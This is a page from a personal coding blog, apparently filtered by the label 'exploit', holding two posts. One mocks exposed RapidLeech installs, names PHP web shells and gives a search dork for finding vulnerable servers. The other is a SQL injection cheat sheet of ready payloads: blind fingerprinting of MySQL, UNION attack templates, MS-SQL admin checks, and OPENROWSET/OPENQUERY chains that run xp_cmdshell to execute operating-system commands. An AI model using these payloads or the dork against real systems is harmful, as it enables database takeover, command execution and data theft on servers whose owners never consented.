Fork me on GitHub
Its the Code garbage collector. Mind dumps of daily coding antics from a frustrated silly little man. VBS, PHP, TCL, TK, PERL, C++, JAVA....what now? Ruby?
No Wait.. It should be just RUBY!
Showing posts with label exploit. Show all posts
Showing posts with label exploit. Show all posts

20080427

Digg + Idiots + RapidShare = p0wn3d


God damn it.. dumb ideas just stay around for far too long.

Ok we all know what the hell rapidshare is. It's a waste of internet space. One thing though a couple of years ago somebody dugg an article on a way to get around restrictions using a server script called rapidleech. Ok all in good fashion, but come on... you leave this open on apache server which can process php files.. and allow public upload to your server from any url.. (r57.php c99/100.php the list just goes on and on.. ) Renaming the file really helped huh..?

Just look at the multiversion google dork:
[2 years later and still 117+ zombies waiting to happen]
"Bugs Report to Rapidget.bug"

Digg idiots: http://digg.com/tech_news/RapidLeech
Posted by shadowbq at 04:51 0 comments
Labels: , , , , ,

20070307

SQL injection and identification

Identify sql Server through Blind SQL injection

http://example.com/index.php?some_var=1/*!40017%20s*/

MySQL is at least 4.0.17 if you get a different result.

## String based (concat ||) ==> PostgreSQL, Oracle
## String based (concat +) ==> MS-SQL, MS-Access

Normal Union attack
$var$quote_type AND 1=1;--
$var$quote_type AND 1=0;--
$var$quote_type union all select $select_statement where 1=0;--
$var$quote_type AND 1=0 union all select $select_statement;--
$var$quote_type AND 1=0 union all select $select_statement union all select $select_statement2;--


MS-SQL

Check if we are admins
IS_SRVROLEMEMBER(convert(varchar,0x73797361646D696E))


Check things like
MSSQL_OPENQUERY
(select 1 from OPENQUERY([$servername],'select 1'))


MSSQL_OPENROWSET
(select 1 from OPENROWSET('SQLOLEDB','';'sa';'$pass','select 1'))

or
(select 1 from OPENROWSET('SQLOLEDB','';'$user';'$pass','select 1'))


If we have a linked server and sa
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENQUERY([TMP],'select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\'';')
select count(*) from TMP_TMP
select 1 where 1=(select cmd from TMP_TMP where id=7)
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')

If already sa
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select @@version')
select * from OPENROWSET('SQLOLEDB','';;,'select @@version')

Other things todo
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\''')
select * from master..TMP_TMP
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')
Posted by shadowbq at 16:20 0 comments
Labels: , , ,
Subscribe to: Posts (Atom)